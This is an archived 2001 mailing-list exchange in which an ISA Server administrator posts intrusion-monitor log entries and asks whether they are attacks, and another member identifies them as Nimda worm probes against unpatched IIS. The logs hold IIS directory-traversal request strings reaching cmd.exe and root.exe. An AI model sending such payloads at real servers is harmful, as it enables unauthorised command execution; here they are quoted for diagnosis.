-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Looks like NIMDA worm attacks to me.. Hope you're IIS boxes are patched up.. Ryan Smith Technical Manager TransWorld Diversified Services, Inc. rsmith@xxxxxxxxxxxxx - -----Original Message----- From: jose [mailto:pepa@xxxxxxxxx] Sent: Monday, October 22, 2001 11:50 AM To: [ISAserver.org Discussion List] Subject: [isalist] attack on server? http://www.ISAserver.org hi all, i have installed on my isa server LANguard. on online monitoring i found followin messsages 9:47:09 212.66.172.88 User: [unauthenticated] Size:3396B. /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 9:47:09 212.66.172.88 User: [unauthenticated] Size:3396B. /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 9:47:08 212.66.172.88 User: [unauthenticated] Size:3396B. /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 9:47:08 212.66.172.88 User: [unauthenticated] Size:3396B. /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 9:47:07 212.66.172.88 User: [unauthenticated] Size:3396B. /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 9:47:06 212.66.172.88 User: [unauthenticated] Size:3396B. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../wi nnt/system32/cmd.exe?/c+dir 9:47:06 212.66.172.88 User: [unauthenticated] Size:225B. /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 9:47:05 212.66.172.88 User: [unauthenticated] Size:3396B. /d/winnt/system32/cmd.exe?/c+dir 9:47:05 212.66.172.88 User: [unauthenticated] Size:3396B. /MSADC/root.exe?/c+dir 9:47:04 212.66.172.88 User: [unauthenticated] Size:3396B. /scripts/root.exe?/c+dir its attacks to server or what is it? thanks for every idea Josef Kovar Czech republic Europe - ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: rsmith@xxxxxxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub') -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> iQA/AwUBO9RBqpQ5bLbxjpmmEQJwdQCffzbbb6v/BDXiVOyEPPx89LWUQJQAn2yQ Nv3ZQOG9umvLmFEeRJoMNOTz =Gd8s -----END PGP SIGNATURE-----